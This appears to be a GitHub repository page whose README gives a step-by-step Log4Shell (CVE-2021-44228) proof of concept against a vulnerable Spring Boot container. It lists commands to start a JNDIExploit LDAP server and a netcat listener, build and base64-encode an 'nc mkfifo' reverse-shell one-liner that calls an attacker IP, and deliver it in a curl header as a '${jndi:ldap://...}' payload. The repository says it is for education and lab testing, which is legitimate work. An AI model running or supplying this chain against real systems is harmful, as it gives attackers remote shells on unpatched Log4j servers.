Skip to content
/ LOg4j-poc Public

This repository is made with intension to educate and experience Log4j vulnerability

github.com/kni9ht/log4j-poc
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kni9ht/LOg4j-poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Log4shell_JNDIExploit
Log4shell_JNDIExploit
 
 
log4shell-vulnerable-app
log4shell-vulnerable-app
 
 
README.md
README.md
 
 

Repository files navigation

LOg4j

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.

Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.

In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it.

Proof-of-concept (POC)

Step 1 : Run Docker File which Include SpringBoot Vulnerable Application

cd log4shell-vulnerable-app
sudo docker run --rm -it -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Step 2 : Run the LDAP Server and Http Server

cd Log4shell_JNDIExploit
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <Your Attacking Machine IP>

Step 3 : Run the netcat Listner where you get reverse shell

nc -lvp <Port you want for Listner>

Step 4 Curl the Application with Malicious Code

[+] Step 1 : goto https://ssl-proxy.my-addr.org/myaddrproxy.php/https/www.revshells.com/
[+] Step 2 : Enter your Attacking Machine IP and Netcat Port which you have used before
[+] Step 3 : Select nc mkfifo in shell Type
[+] Step 4 : Copy the command which look like "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.119.21.67 1188 >/tmp/f"
[+] Step 5 : goto https://gchq.github.io/CyberChef/
[+] Step 6 : Select To Base64 and Enter "A-Za-z0-9-_" in Alphabet
[+] Step 7 : Paste the command you had copied from Reverse Shell Generator and Paste it in Input Box
[+] Step 8 : Copy the String from the Output box that is the Base64 encoding of the Malicious Command which will lead you to Remote shell
[+] Step 9 : Form a Curl request in this manner ⇩
    curl -H 'X-Api-Version: ${jndi:ldap://<Attacking Machine IP>:1389/Basic/Command/Base64/<Base64 Command you just copied Step 8>}' http://localhost:8080

Disclaimer

This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this awesome vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: https://log4shell.tools/).

Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.

Reference

All Credits goes to the Developer

log4shell-vulnerable-app by christophetd
Log4shell_JNDIExploit re-uploaded by black9

About

This repository is made with intension to educate and experience Log4j vulnerability

github.com/kni9ht/LOg4j-poc

Topics

log4j remote-command-execution

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages